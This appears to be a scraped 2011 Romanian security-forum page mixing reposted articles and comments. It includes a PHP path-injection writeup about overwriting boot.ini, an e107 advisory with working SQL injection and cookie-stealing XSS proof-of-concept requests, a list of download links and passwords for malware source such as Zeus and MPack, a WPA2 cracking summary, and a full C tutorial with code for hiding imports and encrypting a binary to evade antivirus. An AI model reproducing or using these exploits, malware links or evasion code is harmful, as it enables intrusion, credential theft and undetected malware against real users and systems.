File path injection in PHP ? 5.3.6 file upload (CVE 2011-2202) Saturday, June 18, 2011 Since the thing went public before new PHP version has been released, I present full details of the latest PHP vulnerability I reported - together with some sweet demo exploit. The issue was found with fuzzing being part of my recent file upload research. And I still have some more to show in the future My thanks go to Pawe? Gole? who helped analyze the vulnerability. The PHP Part The whole issue is tracked as PHP bug #54939, but the website is now down. The exemplary exploit is at pastebin. The nature of the bug is simple. PHP claims to remove the path component from HTTP file upload forms (transferred as MIME multipart/form-data requests), leaving only the file name given by the user agent. This is both for security, and to fix MSIE incompatibility (IE used to send full path like this: c:\WINDOWS\WHATEVER\My_file.txt). However, in 2008 PHP developers made a off-by-one error, and, as a result, if a name starts with \ or / and has no other (back)slashes, it's left as-is. So, this allows for: /vmlinuz /autorun.inf (/ will map to C:\ in WINDOWS - the drive where your PHP is run from) /boot.ini and other interesting file "names" to pass through. The application part Of course, what this means is simply that $_FILES[$input_field_name]['name'] will contain unsanitized file path - and that's not enough to complete an exploit. PHP script would need to use that filename as a destination for file writing. Unfortunately, at least a few applications do. I've found some pretty interesting examples. Among them is this AjaxFileUpload plugin. There are more applications with the same approach - just go on looking! AjaxFileUpload simply passes the given file "name" to move_uploaded_file(), which would try to create/overwrite a file in a root directory... The set up part And that will most likely fail, because of insufficient permissions. Who on Earth would allow PHP to write to root? Well, default Apache installation on Windows systems is run as a SYSTEM user (a.k.a root). Also, for some shared hostings PHP is run in a chroot-ed environment, and / is the document root of a website (which allows for an easy site defacement). It's tricky, I agree, that's why this bug is v. difficult to exploit in the wild (luckily). But it's possible! Today's Heroes: WAMP server, newest version (PHP 5.3.5), default install PHP <= 5.3.6, (5.3.5 in the demo) Windows XP AjaxFileUpload - A jQuery plugin that simulates asynchronous file uploads. In the exploit I simply show that (thanks to vulnerable set up) I can overwrite c:\boot.ini and make the system unbootable. There are more advanced scenarios that could be done (essentially I can supply a boot record file to use on next boot), but it's not my area of expertise. To upload a file, the HTML5 arbitrary file upload technique was used. So, patch your PHPs and bye! Sursa si video demonstrativ: http://blog.kotowicz.net/2011/06/file-path-injection-in-php-536-file.html

e107 0.7.25 Cross Site Scripting / SQL Injection Cred ca inca e destul de folosit... Vulnerability ID: HTB23004 Reference: http://www.htbridge.ch/advisory/multiple_vulnerabilities_in_e107_1.html Product: e107 website system Vendor: e107 ( http://e107.org/ ) Vulnerable Version: 0.7.25 and probably prior Tested on: 0.7.25 Vendor Notification: 25 May 2011 Vulnerability Type: Multiple Vulnerabilities Risk level: Medium Credit: High-Tech Bridge SA Security Research Lab ( http://www.htbridge.ch/advisory/ ) Vulnerability Details: 1. SQL injection in e107 The vulnerability exists due to failure in the "/e107_admin/users_extended.php" script to properly sanitize user-supplied input in "user_field" variable. "magic_quotes" must be set to "off". Attacker can alter queries to the application SQL database, execute arbitrary queries to the database, compromise the application, access or modify sensitive data, or exploit various vulnerabilities in the underlying SQL database. Attacker can use browser to exploit this vulnerability. The following PoC code is available: POST /e107_admin/users_extended.php?cat= HTTP/1.1 Host: HOST Cookie: <valid session cookies> Content-Type: application/x-www-form-urlencoded Content-Length: user_field=sss','',0, ','','', '0', '253','0','0','253','0','0'),('0',(select user()),'',0,'','','','0','253','0','0','253','0','0'),('0','dfg&user_applicable=253&user_read=0&user_write=253&add_category=Add+category 2. XSS in e107 User can execute arbitrary JavaScript code within the vulnerable application. The vulnerability exists due to failure in the "/e107_admin/users_extended.php" script to properly sanitize user-supplied input in "user_include" variable. Successful exploitation of this vulnerability could result in a compromise of the application, theft of cookie-based authentication credentials, disclosure or modification of sensitive data. An attacker can use browser to exploit this vulnerability. The following PoC code is available:: poc.html <script> setTimeout("document.getElementById('f1').src='http://HOST/e107_admin/users_extended.php'",2000); </script> <iframe id=f1 src='form.html'></iframe> form.html <form method="POST" action="http://HOST/e107_admin/users_extended.php?editext" name=m> <input type="hidden" name="user_field" value="abcde1f1"> <input type="hidden" name="user_text" value="12121"> <input type="hidden" name="user_type" value="1"> <input type="hidden" name="user_include" value='"><script>alert(document.cookie)</script>'> <input type="hidden" name="add_field" value="1"> <input type="hidden" name="user_parent" value="0"> <input type="hidden" name="user_required" value="0"> <input type="hidden" name="user_applicable" value="255"> <input type="hidden" name="user_read" value="0"> <input type="hidden" name="user_write" value="253"> <input type="hidden" name="user_hide" value="0"> <input type=submit> </form> <script> document.m.submit(); </script> Sursa: e107 0.7.25 Cross Site Scripting / SQL Injection ? Packet Storm

Why SSDs are worth the money Here's a great, sweary presentation from Artur Bergman about the joy of using SSDs in your laptop and data-center, and how it's totally, absolutely worth the expense of replacing spinning drives with solid-state drives. I've been solid-state for more than a year, and I totally, absolutely agree. Video: http://www.boingboing.net/2011/06/17/why-ssds-are-worth-t.html

Learn Python The Hard Way, 2nd Edition This is the HTML preview of Learn Python The Hard Way, 2nd Edition. It is a work in progress and will most likely have some errors as I work on the full release of the 2nd Edition. The Hard Way Is Easier Exercise 0: The Setup Exercise 1: A Good First Program Exercise 2: Comments And Pound Characters Exercise 3: Numbers And Math Exercise 4: Variables And Names Exercise 5: More Variables And Printing Exercise 6: Strings And Text Exercise 7: More Printing Exercise 8: Printing, Printing Exercise 9: Printing, Printing, Printing Exercise 10: What Was That? Exercise 11: Asking Questions Exercise 12: Prompting People Exercise 13: Parameters, Unpacking, Variables Exercise 14: Prompting And Passing Exercise 15: Reading Files Exercise 16: Reading And Writing Files Exercise 17: More Files Exercise 18: Names, Variables, Code, Functions Exercise 19: Functions And Variables Exercise 20: Functions And Files Exercise 21: Functions Can Return Something Exercise 22: What Do You Know So Far? Exercise 23: Read Some Code Exercise 24: More Practice Exercise 25: Even More Practice Exercise 26: Congratulations, Take A Test! Exercise 27: Memorizing Logic Exercise 28: Boolean Practice Exercise 29: What If Exercise 30: Else And If Exercise 31: Making Decisions Exercise 32: Loops And Lists Exercise 33: While Loops Exercise 34: Accessing Elements Of Lists Exercise 35: Branches and Functions Exercise 36: Designing and Debugging Exercise 37: Symbol Review Exercise 38: Reading Code Exercise 39: Doing Things To Lists Exercise 40: Dictionaries, Oh Lovely Dictionaries Exercise 41: Gothons From Planet Percal #25 Exercise 42: Gothons Are Getting Classy Exercise 43: You Make A Game Exercise 44: Evaluating Your Game Exercise 45: Is-A, Has-A, Objects, and Classes Exercise 46: A Project Skeleton Exercise 47: Automated Testing Exercise 48: Advanced User Input Exercise 49: Making Sentences Exercise 50: Your First Website Exercise 51: Getting Input From A Browser Exercise 52: Testing The Web Application Next Steps Advice From An Old Programmer Indices and tables Index Module Index Search Page Online: http://learnpythonthehardway.org/book/

Cracking WPA2 Tutorial June 16th, 2011 | By: Andrew Whitaker| In this video we will demonstrate how to crack WPA2 using the Airmon-ng suite. We will do it by: Identifying an access point Capturing traffic from that access point Attempt to capture the handshake. We have two options for doing this. We can wait for a client to connect on their own We can run a deauth attack to force them to disconnect and then you can capture the handshake then . Once you have captured the handshake, you can attempt to crack it with a word list or a rainbow table. The key can then be found from there. Enjoy. Youtube: http://www.youtube.com/watch?v=pvjMJKUfAjo Sursa: Cracking WPA2 Tutorial | InfoSec Resources

Malware Sourcecode Mpack: http://www.secguru.com/files/MPack_Toolkit_v0.94.rar (pass: infected) Crimepack: MEGAUPLOAD - The leading online storage and file delivery service IncognitoRat: http://incognitorat.com/db/Files GhostRat: MEGAUPLOAD - The leading online storage and file delivery service Exe2Vbs: PURGATORY VIRUS TEAM - Exe2Vbs v1.6 Zeus: http://www.mdl4.com/files/zeus.rar (pass:zeus) Stuxnet: https://github.com/Laurelai/decompile-dump/zipball/master ZeroAccess/Max++(64Bit): http://resources.infosecinstitute.com/wp-content/uploads/Max++-downloader-install_2010.zip Posted by Satyam Pujari a.k.a Satyamhax Sursa: ::eSploit::: Malware Sourcecode

Aoleu, cred ca C++ este cel mai bine structura limbaj din perspectiva OOP. Poate doar C# il poate surclasa...

Am început cu programele mici in Visual Basic 6. Apoi am pus mana pe o carte de 900 de pagini (Visual Basic 6 - Manualul programatorului) si pe una de vreo 700 (Visual Basic 5 - 1001 de exemple, cam asa ceva) si am inteles limbajul. Cu testele pe diferite API-uri Windows, citind documentatia de pe MSDN pe care initial nu o citeam ci doar banuiam ce fac acele functii, am inceput sa inteleg perfect cum sta treaba. Si cotrobaiam prin multe coduri sursa de unde am invatat multe. Apoi am trecut pe PHP, am citit "Initiere in PHP 5" - Steve Holzner apoi "PHP 4 in imagini" si am invatat cam tot ce imi trebuia la inceput. HTML stiam deja partial, si din ce mai facusem la scoala... Iar MySQL din capitolele dedicate acestui SGBDR din cartile enumerate. Cu timpul am citit si documentatia multor functii de pe php.net si intreg capitolul dedicat PHP 5 - OOP, si multe alte lucruri de pe php.net. Si din coduri sursa am mai invatat cate ceva. Am trecut apoi si la o cartulie de JavaScript si vreau sa invat notiuni mai avansate de MySQL. C++ am invatat din liceu, dar nu mare lucru. Abia anul acesta m-am apucat serios de OOP (facultate) si e singura materie care mi-a placut si la care am inteles cam toate prostiile, cat de marunte, de la mostenire virtuala la RTTI. Am citit "C++ manual complet" - Herbert Schildt, "C++ pentru incepatori volumul II" - Liviu Negreanu, am retinut multe idei din "Secrete C++" - Constantin Galatean... Am citit si o carte despre Java si anume "Java de la 0 la expert" care mi s-a parut cea mai buna carte de programare citita, si o carte despre "Perl", dar nu m-au pasionat aceste limbaje si nu mai stiu mare lucru, nu prea le-am folosit. Pe Linux, shell scriping nu stiu cine stie ce, doar idile de baza, citite intr-un articol, doua si din citirea si modificarea diverselor fisiere de sistem. Eu nu pot citi carti pe calculator, nu suport, prefer formatul pe hartie. Si imi place sa citesc, citeam si literatura... In fine, asta e ideea mea de baza: invatati din carti! Una e sa iti explice cineva care lucreaza de ani de zile in domeniu, alta e sa iti explice Vasile de 12 ani care a inteles si el dintr-un tutorial ca daca pui "echo 'Plm';" apare pe site "Plm". Ca tot veni vorba: degeaba invatati un limbaj de programare daca nu lucrati des in el. Faceti proiecte! Cat mai multe si cat mai complexe. Va veti trezi ulterior ca vreti sa va angajati si... CV? Ce o sa treceti acolo? Conteaza proiectele foarte mult, cat de mici. Ca sugestie: faceti-va acum un CV. Si o sa vedeti ca nu prea aveti ce trece acolo. Da, puteti spune ca stiti n limbaje de programare, dar la interviuri se intreaba: - C: scrie in C o functie care inverseaza o lista simplu inlantuita - C++: se da un exemplu cu o functie virtuala si upcasting, sa spui daca codul e corect sau nu (daca vreti sa vedeti cate rahaturi pot sa apara in programe OOP in C++ postati aici si o sa vedeti ca nu e atat de usor sa fii un compilator uman) - PHP: se da o clasa, se serializeaza apoi se deserializeaza un obiect, cu __sleep si __wakeup de riguare. Ce se va afisa daca nu stiu ce... - PHP: se da o clasa abstracta, se mosteneste dar nu se implementeaza toate metodele bla bla... In fine, sunt foarte multe lucruri. Daca nu cititi o documentatie serioasa, gen CARTE nu aveti de unde sa le stiti. Sfatul meu: CITITI!

Nu e cine stie ce, trebuia sa fie bazat pe expresii regulate, asa ar fi fost de preferat. Oricum, nu are cum sa detecteze exact o vulnerabilitate, detecteaza partial cod potential vulnerabil. De exemplu, SQL Injection se gaseste la interogari, efectuate de exemplu cu mysql_query. Programul cauta dupa aceste apeluri.

S-a lansat Kaspersky Endpoint Security 8 for Linux Securitate | 17 Iunie 2011 Kaspersky Lab anun?? lansarea solu?iei business Kaspersky Endpoint Security 8 for Linux, care combin? toate func?ionalit??ile versiunii anterioare de Kaspersky Anti-Virus 5.7 for Linux cu cele ale Kaspersky Anti-Virus 5.5 for Samba. Administrarea produsului este realizat? prin intermediul unei interfe?e grafice intuitive, care este pe deplin compatibil? cu ecosistemele desktop Gnome ?i KDE. De asemenea, parametrii programului pot fi configura?i ?i din fereastra de comand? (command line). Kaspersky Endpoint Security 8 for Linux face parte din linia de solu?ii de securitate dedicate companiilor ?i poate fi integrat? în infrastructura de securitate a organiza?iei. Aceasta este compatibil? cu toate distribu?iile de Linux, atât pe 32, cât ?i pe 64 de bi?i. Kaspersky Endpoint Security 8 for Linux ofer? protec?ie complet? sta?iilor de lucru care opereaz? pe sisteme Linux, datorit? urm?toarelor inova?ii: • Solu?ia include noul motor antivirus – Kaspersky Anti-Virus Engine 8.0, un modul de analiz? euristic? ?i suport pentru dezinfectarea fi?ierelor stocate în arhive. • Kaspersky Endpoint Security 8 for Linux neutralizeaz? cu succes amenin??rile informatice care ?intesc sistemele de operare Linux, precum ?i pe cele care atac? platformele Windows ?i Mac OS X. Astfel, suita ofer? protec?ie complet? întregii re?ele a companiei, care include ?i sta?ii de lucru care nu opereaz? numai pe Linux. • Noul produs include consola Kaspersky Administration Kit 8.0, o interfa?? centralizat? de management care ofer? posibilitatea administr?rii de la distan??, vizualizarea de rapoarte ?i modificarea politicilor globale de securitate. „Kaspersky Endpoint Security 8 for Linux extinde oportunit??ile disponibile companiilor în termeni de securitate informatic? ?i permite acestora s? implementeze sisteme pentru protec?ia infrastructurii IT, indiferent de platformele de operare folosite pe sta?iile de lucru. Noua versiune a produsului ofer? protec?ie complet? computerelor cu Linux ?i include instrumentele necesare pentru configurarea, controlul ?i gestionarea politicilor centralizate de securitate”, a spus Teodor Cimpoe?u, Managing Director Kaspersky Lab România ?i Bulgaria. Sursa: S-a lansat Kaspersky Endpoint Security 8 for Linux | Agora.ro

Pentru cei care cauta vulnerabilitati in codul sursa e painea lui Dumnezeu.

Au strans 150.000 de "fani" pe twitter. Si i-au pus sa sune la un anumit numar. Apelurile erau redirectionate care Wow Call Center de exemplu. Si cica sunt "1337"... Ratati...

Eu am zis parerea mea in alt topic. Au fost niste atacuri la diverse site-uri, care erau deja revendicate de "x" si "y" apoi se trezesc ratatii astia si zic ca ei sunt "hackerii". La fel si cu pron.com de exemplu, cred ca mai intai a fost gasit de Tinko de al nostru apoi se trezesc ratatii astia sa zica ca ei l-au gasit. De fapt nici nu zic, doar ca se trezesc niste rahati imputiti din presa (muie presei) care ii promoveaza,

DDOS. Ratati. Tot e posibil sa nu fi avut nicio legatura. Script-kiddies. De exemplu au postat un nr. de telefon pe twiter, ratatii au sunat si redirectionau apelurile la diverse Call-Centers ale anumitor companii. Ce "1337"... Copii fara viitor.

Probabil: - Florin Salam - Am norocul scris in frunte :->

Ne ia 2 minute sa facem o asemenea pagina, de ce am plati pentru ea? Da, nu ai nimerit unde trebuie, nu gasesti aici clienti pentru asemenea porcarii.

JavaScript PDF Reader Interesanta idee... Download: https://github.com/andreasgal/pdf.js https://raw.github.com/andreasgal/pdf.js/master/pdf.js

The Art of the Cyberwar The development of new technologies, in catching up with military interests and dependence on existing technology by developed countries, sets up a scenario where the cyber war, or war in cyberspace, is becoming more important. All countries aware of the risks of such dependence developed defense programs against attacks that could jeopardize critical national infrastructure. On the other hand, developing countries and major world powers are training computer security experts in various techniques of hacking, cracking, virology, etc.., forming true experts in cyber warfare, called cyberwarriors. That does not fit anyone doubt that the future wars will not be determined or land or sea or air, but in cyberspace. The soldiers do not carry weapons or shields, but knowledge and deploy applications that war virus, disabling the enemy's critical systems that are technologically dependent. This is the scenario where the world is moving now, a scenario of technological dependence, where countries with more traditional military strength will be losing ability to war for countries with highly qualified in computer security and cyber techniques. This essay is intended as a point of reflection and knowledge about cyber warfare, on the present philosophy of Sun Tzu in the Art of War, and adapt their knowledge to technological scenario which we live and live, so we can get a modern compendium: The Art of Cyberwar. Download: http://www.malwareint.com/docs/the-art-of-the-cyberwar-en.pdf

Nu mai stiu exact ce si cum, dar vazusem cu mult inainte niste "atacuri" deja "semnate" de nu stiu cine pe care s-au gandit ei sa si le atribuie. Si au facut asta de multe ori. La fel cu Play Station, datele facute publice au aparut mai intai in alte locatii, apoi s-au trezit ei ca au spart ei site-urile celor de la Sony... Si acum tot isi atribuie ce se intampla pe mapamond. Sunt niste ratati.

LulzSec spun multe. Spun ca ei au "spart" tot ce s-a "spart" de multa vreme pana in prezent. Sunt niste ratati.

Clever tricks against antiviruses I bet you have come across some software you’ve made which you didn’t want the AV to pick up. This article explains how to import from DLLs without having to call GetProcAddress, and also how to encrypt your data section. Anti-viruses rely heavily on their heuristics, if all other (signature) scans fail. The patterns they search for in your executable, are the functions being imported, and the order they are being called. No imports! Having no import table is relatively easy. There are however some functions I haven’t imported dynamically, but which are very normal in any application (libc functions). The steps you need to do are: Get the kernel32 module base address. (kernel32.dll is always loaded when the process is started, and so is ntdll.dll) Make your own GetProcAddress Use it to find LoadLibrary’s address, so that you can load other DLLs Make the functions usable in a practical way, so that you don’t have to make a prototype for each of the functions that you will load 1. Get kernel32?s base address The first step is easy. There are lots of methods out there to retrieve the kernel32 base address, whose list of supported platforms varies greatly. I will be retrieving the address using the PEB (the linked list of the modules’ initialization order). Code: void __declspec(naked) *kernel_addr() { // Get kernel32 base address through PEB (initialization order) __asm { mov eax, fs:[0x30] // PEB address mov eax, [eax+0x0c] // PEB->Ldr mov eax, [eax+0x1c] // Ldr.InInitializationOrderModuleList (ntdll) mov eax, [eax] // [ntdll].Flink (kernel32) mov eax, [eax+0x08] // kernel32 base address ret } } You can use whichever method you want, really, as long as the end result is the kernel32 base address. 2. Our own GetProcAddress If you have ever had to deal with the PE format, you’d know that the exports have three main structures. These are the address table, the name table, and the ordinal table. The address table is simply just an array with RVAs to functions. There is one entry for every function exported. To get the real address, you add that RVA to the base address of the module. The name table, is another array with RVA’s to the names of the functions. The names are just strings of characters terminated by a null byte. The problem is, the names’ index doesn’t always correspond to the functions’ index. To retrieve the index, you use the ordinal table. The ordinal table is basically just an array with an index to the corresponding function. For example EAT[0] might be the function with the name ENT[42]. In this case, EOT[42] has the value of 0. So, the ordinal table is just another table, which maps a name to a function, using the name’s index to retrieve the function’s index. void *my_gpa(HMODULE modl, char *fname) { unsigned long modb = (unsigned long)modl; IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)modb; IMAGE_NT_HEADERS *nth = (IMAGE_NT_HEADERS *)(modb+dosh->e_lfanew); IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(modb+nth->OptionalHeader.DataDirectory->VirtualAddress); unsigned int i; for(i = 0; i < ied->NumberOfNames; i++) { const char *nn = (*(const char **)(ied->AddressOfNames+modb+i*sizeof(void *)))+modb; if(!strcmp(fname, nn)) { unsigned short ordinal = *(unsigned short *)(ied->AddressOfNameOrdinals+modb+i*sizeof(unsigned short)); return (void *)((unsigned long)*(void **)(ied->AddressOfFunctions+modb+ordinal*sizeof(void *))+modb); } } return NULL; } In our code, modb is the base address of the module. Using that, we make our way to the export directory (ied), which contains the RVAs to the three tables we need. They are ied->AddressOfNames, ied->AddressOfFunctions and ied->AddressOfNameOrdinals. There’s some pointer arithmetic going on there, along with some type casting. Our function works just like GetProcAddress. It takes a module base address, and a function name, and returns a function address. We iterate through each entry in the name table. The string is retrieved through nn. (RVA of the table + base address + i*4)+base address – each entry in the table has the size of a word (32 bits = 4 bytes), so to get to the i’th entry, we add i*4. Once we’ve gotten to the i’th entry and dereferenced it, we add the base address to get the string’s address. If the name’s are the same, get the ordinal, the same way (except that one ordinal is the size of a short, 16 bits = 2 bytes). Then using the ordinal as an index, retrieve the address of the function and return it. 3. Getting LoadLibrary’s address Easiest step. The code speaks for itself: HMODULE (__stdcall *dyn_ll)(LPCTSTR lpFileName); dyn_ll = my_gpa(kern, "LoadLibraryA"); 4. Making it usable You will probably want to load lots of functions, not just one or two. Writing the prototypes for all of them would be tedious. Let’s make an array of functions for each module we will load, then let’s also make a function to load the APIs into these arrays. I have used kernel32, user32, and winsock. // don't forget to specify the correct calling convention char *fn_kernel[] = { "GetEnvironmentVariableA", // 0 "GetModuleFileNameA", // 1 "GetTickCount", // 2 "GetLocalTime", // 3 "CreateThread", // 4 "SetThreadPriority", // 5 }; unsigned long (__stdcall *func_kernel[sizeof(fn_kernel)/sizeof(*fn_kernel)])(); char *fn_user[] = { "MessageBoxA", // 0 "GetForegroundWindow", // 1 "GetWindowTextA", // 2 }; unsigned long (__stdcall *func_user[sizeof(fn_user)/sizeof(*fn_user)])(); char *fn_wsock[] = { "WSAStartup", // 0 "send", // 1 "connect", // 2 "socket", // 3 "gethostbyname", // 4 "closesocket", // 5 "recv", // 6 "WSACleanup", // 7 }; unsigned long (WSAAPI *func_wsock[sizeof(fn_wsock)/sizeof(*fn_wsock)])(); HMODULE (__stdcall *dyn_ll)(LPCTSTR lpFileName); void *my_gpa(HMODULE modl, char *fname) { unsigned long modb = (unsigned long)modl; IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)modb; IMAGE_NT_HEADERS *nth = (IMAGE_NT_HEADERS *)(modb+dosh->e_lfanew); IMAGE_EXPORT_DIRECTORY *ied = (IMAGE_EXPORT_DIRECTORY *)(modb+nth->OptionalHeader.DataDirectory->VirtualAddress); unsigned int i; for(i = 0; i < ied->NumberOfNames; i++) { const char *nn = (*(const char **)(ied->AddressOfNames+modb+i*sizeof(unsigned long)))+modb; if(!strcmp(fname, nn)) { unsigned short ordinal = *(unsigned short *)(ied->AddressOfNameOrdinals+modb+i*sizeof(unsigned short)); return (void *)((unsigned long)*(void **)(ied->AddressOfFunctions+modb+ordinal*sizeof(unsigned long))+modb); } } return NULL; } void load_imports() { HMODULE kern, user, wsock; unsigned long i; kern = kernel_addr(); dyn_ll = my_gpa(kern, "LoadLibraryA"); user = dyn_ll("user32.dll"); wsock = dyn_ll("ws2_32.dll"); for(i = 0; i < sizeof(fn_kernel)/sizeof(*fn_kernel); i++) func_kernel[i] = my_gpa(kern, fn_kernel[i]); for(i = 0; i < sizeof(fn_user)/sizeof(*fn_user); i++) func_user[i] = my_gpa(user, fn_user[i]); for(i = 0; i < sizeof(fn_wsock)/sizeof(*fn_wsock); i++) func_wsock[i] = my_gpa(wsock, fn_wsock[i]); } int main(int argc, char *argv[]) { WSADATA wsd; load_imports(); // MessageBoxA func_user[0](0, "MessageBoxA has been called!", "0wn3d.", MB_OK); func_wsock[0](MAKEWORD(1, 0), &wsd); // WSAStartup // evil stuff here func_wsock[7](); // WSACleanup return EXIT_SUCCESS; } Simple. Encrypting your data section This method is really easy, and of course it’s not nearly as good as the average packer, but it keeps AVs away from your strings. I have used the rc4 cipher, but any symmetric stream cipher would do. We need to encrypt it from another separate program, and have our program decrypt itself. Code for the encryption program: #include <windows.h> #include <imagehlp.h> #include <stdlib.h> #include <stdio.h> #define DATA ".data" // data section's name #define KEY "DqHAI5VN" // encryption key #define NEW 0x11c8 // new ep rva #define REP 0x5e4 // offset to patch with the old ep void rc4_ksched(unsigned char *key, unsigned long keylen, unsigned char sbox[0x100]) { unsigned long i, j; for(i = 0; i < 0x100; i++) sbox[i] = (unsigned char)i; for(j = i = 0; i < 0x100; i++) { unsigned char tmp; j = (j + sbox[i] + key[i % keylen]) & 0xff; tmp = sbox[i]; sbox[i] = sbox[j]; sbox[j] = tmp; } } void rc4(unsigned char sbox[0x100], unsigned char *src, unsigned char *dest, unsigned long len) { unsigned long i, j; i = j = 0; while(len--) { unsigned char tmp; i = (i + 1) & 0xff; j = (j + sbox[i]) & 0xff; tmp = sbox[i]; sbox[i] = sbox[j]; sbox[j] = tmp; *dest++ = *src++ ^ sbox[(sbox[i] + sbox[j]) % 0xff]; } } int main(int argc, char *argv) { FILE *f = fopen("evil.exe", "r+b"); IMAGE_DOS_HEADER dosh; IMAGE_NT_HEADERS nth; IMAGE_SECTION_HEADER sech, dummy; if(!f) return 1; memset(&dummy, 0, sizeof(dummy)); fread(&dosh, 1, sizeof(dosh), f); fseek(f, dosh.e_lfanew, SEEK_SET); fread(&nth, 1, sizeof(nth), f); fread(&sech, 1, sizeof(sech), f); while(memcmp(&sech, &dummy, sizeof(dummy))) { if(!strcmp(sech.Name, DATA)) { unsigned char sbox[0x100], *rd = malloc(sech.SizeOfRawData); DWORD ep, epaddr; rc4_ksched(KEY, 8, sbox); fseek(f, sech.PointerToRawData, SEEK_SET); fread(rd, 1, sech.SizeOfRawData, f); rc4(sbox, rd, rd, sech.SizeOfRawData); fseek(f, sech.PointerToRawData, SEEK_SET); fwrite(rd, 1, sech.SizeOfRawData, f); free(rd); epaddr = ((unsigned long)&nth.OptionalHeader.AddressOfEntryPoint-(unsigned long)&nth)+dosh.e_lfanew; fseek(f, epaddr, SEEK_SET); ep = NEW; fwrite(&ep, 1, 4, f); fseek(f, REP, SEEK_SET); ep = nth.OptionalHeader.AddressOfEntryPoint+nth.OptionalHeader.ImageBase; fwrite(&ep, 1, 4, f); fclose(f); return EXIT_SUCCESS; } fread(&sech, 1, sizeof(sech), f); } fclose(f); return EXIT_FAILURE; } What it does is that it searches for the data section, and when found, it reads it into memory, encrypts it, and writes it back. But to be able to decrypt it we must have some piece of code in our own executable, which will decrypt the data section using our key, and then jump back to the old entry point. void decrypt_data(unsigned long mod) { char data[6]; IMAGE_DOS_HEADER *dosh = (IMAGE_DOS_HEADER *)mod; IMAGE_SECTION_HEADER *sech = (IMAGE_SECTION_HEADER *)(mod+dosh->e_lfanew+sizeof(IMAGE_NT_HEADERS)); IMAGE_SECTION_HEADER dummy; data[0] = '.'; data[1] = 'd'; data[2] = 'a'; data[3] = 't'; data[4] = 'a'; data[5] = 0; memset(&dummy, 0, sizeof(dummy)); while(memcmp(sech, &dummy, sizeof(dummy))) { if(!strcmp(sech->Name, data)) { unsigned char sbox[0x100], key[9]; key[0] = 'D'; key[1] = 'q'; key[2] = 'H'; key[3] = 'A'; key[4] = 'I'; key[5] = '5'; key[6] = 'V'; key[7] = 'N'; key[8] = 0; rc4_ksched(key, 8, sbox); rc4(sbox, (unsigned char *)mod+sech->VirtualAddress, (unsigned char *)mod+sech->VirtualAddress, sech->SizeOfRawData); return; } sech++; } exit(EXIT_FAILURE); } void __declspec(naked) *gba() { __asm { mov eax, fs:[0x30] // PEB address mov eax, [eax+0x08] // PEB->BaseAddress ret } } void __declspec(naked) new_ep() { if(*(unsigned long *)magic != 'x86!') decrypt_data((unsigned long)gba()); __asm { push 0x41414141 // placeholder ret } } And in main: unsigned long nep_addr; int main(int argc, char *argv[]) { WSADATA wsd; nep_addr = (unsigned long)&new_ep; load_imports(); // MessageBoxA func_user[0](0, "MessageBoxA has been called!", "0wn3d.", MB_OK); func_wsock[0](MAKEWORD(1, 0), &wsd); // WSAStartup // evil stuff here func_wsock[7](); // WSACleanup return EXIT_SUCCESS; } We reference new_ep, because otherwise the optimizing compiler would notice that it is not called anywhere and would not generate code for it. Here you will have to get some offsets. First compile the executable, and disassemble it. Find the RVA of new_ep, and put it in the encryption program source code. Then find the offset of the placeholder for the old entry point. The instruction will look like push 0×41414141. Add one to the address of that instruction, subtract the image base from it, subtract the RVA of the .text section from it, add the offset of the .text section to it, and there you have your offset. Now put it in the encryption source, compile it, run it, and everything is ready Well, that was everything. If you found this article helpful or have a question, feel free to post a comment. Articolul mai elegant: http://www.x-n2o.com/clever-tricks-against-antiviruses/

AES Explained Hello people, It’s been a while since I have last posted an article. I decided to write an article about the Advanced Encryption Standard. I will explain certain concepts regarding AES and how it basically works. I will provide step by step C code, to make it even easier to understand. You can find the full source code at the end of this article. Actually many websites around the net provide source code for AES. This one is supposed to be easy to understand What is AES? AES is a cryptographic algorithm, more specifically a symmetric block cipher. This means that it operates at a block of data, instead of a single element per iteriation. (This element could be a bit or a byte). AES is also known as Rijndael. Actually AES is just a variant of Rijndael. To read more about AES/Rijndael see Advanced Encryption Standard - Wikipedia, the free encyclopedia. Especially the links at the bottom, they help understanding the basic structure of AES. AES is able to encrypt and decrypt a block of data using a key. The key and the block of data (from now on, the input) have a fixed length. The input is always 128-bit (16 bytes), while the key can be 128-bit, 192-bit or 256-bit (16, 24 and 32 bytes respectively). What makes AES so good you say? The answer would be it’s security and speed. It’s obviously secure since it’s been chosen by NIST. Then again, no one has been able to break it. And finally, it’s fast because it’s arithmetic is based on XOR operations and bit shifts, which CPUs like a lot. That said, it’s also simple and even faster to implement in hardware. AES Concepts Before I begin talking about the cipher itself, there are some very important concepts that I need to explain. They’re basically the math behind AES. Everything else is easy. This is actually the hardest part. Why am I explaining the hardest part before the everything else? Because if you don’t understand this, you won’t be able to understand the rest of this article. Of course, if you just want the source code, skip to the end. The content below may refer to the specification, which is located here: http://csrc.nist.gov/publications/fips/fips197/fips-197.pdf Articolul frumos aranjat: http://www.x-n2o.com/aes-explained/